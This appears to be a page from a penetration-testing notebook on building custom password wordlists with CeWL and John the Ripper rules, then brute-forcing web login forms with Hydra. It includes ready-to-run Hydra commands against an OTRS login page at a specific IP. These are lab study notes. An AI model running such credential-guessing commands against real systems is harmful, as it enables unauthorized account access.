Create Wordlist

The intent here is to create our own wordlist for a website/page we want to Bruteforce credentials (Not always rockyou.txt works so here we are)

Cewl + Hydra

# Create a Wordlist of a website and Put the whole path of the website
cewl -w wordlist.txt -d 5 http://<IP>/html5

# Change -l user and pass, post request and Failed request, -s is for port
hydra -l root@localhost -P wordlist.txt <IP> http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:Login Failed" -V
hydra -L ../usernames.txt -P /root/scripts/wordlist/CeWL/pw.txt 10.11.1.39 http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I

Bruteforce | refabr1k's Pentest Notebookrefabr1k.gitbook.io

How to Brute Force Websites & Online Forms Using HydraInfinite Logins

Defeating HTTP Basic Auth with HydraCode Zen

# Creating a Wordlist with Cewl
cewl www.testwebsite.com -m 6 -w pass.txt # -m is min 6 length word

# Creating wordlist + Adding a rule in Johntheripper
sudo nano /etc/john/john.conf

-> Add this rule in last, Add two numbers to the end of each password
$[0-9]$[0-9]

# Took the wordlist, added rules, and outputted in mutated.txt
john --wordlist=pass.txt --rules --stdout > mutated.txt

PreviousHash Crack NextFile Uploads

Last updated 2 years ago

hashtagCewl + Hydra

Cewl + Hydra